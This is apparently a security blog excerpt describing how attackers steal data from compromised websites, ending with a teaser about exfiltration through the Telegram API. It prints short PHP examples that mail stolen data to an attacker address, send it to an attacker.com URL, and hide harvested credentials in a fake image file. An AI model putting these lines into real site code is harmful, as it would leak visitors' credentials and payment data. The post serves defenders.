Server Side Data Exfiltration via Telegram API

One of the themes commonly highlighted on this blog includes the many creative methods and techniques attackers employ to steal data from compromised websites. Credit card skimmers, credential and password hijackers, SQL injections, and even malware on the server level can be used for data exfiltration.

What’s more, attackers may be able to accomplish this feat with a few mere lines of code. For example:

Emailing the data:

@mail(“email@attacker.com”, $_SERVER[“SERVER_NAME”], $stolenData);

Writing the data to a local file:

fwrite($fh, $stolenData);

Sending the data to an email address under the attacker’s control:

@file_get_contents(“http://attacker.com/cgi-bin/optimus.pl?prime=$stolenData”);

Writing the data to an image file within the website to avoid raising suspicion:

$hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’);
$write=fwrite($hellowp,$username_password,$time);

Harvesting & Exfiltrating Stolen Data via Telegram

One interesting technique our team has come across in recent months leverages the Telegram API to exfiltrate stolen data and send it in a private message to a bot under the attackers control.

Continue reading Server Side Data Exfiltration via Telegram API at Sucuri Blog.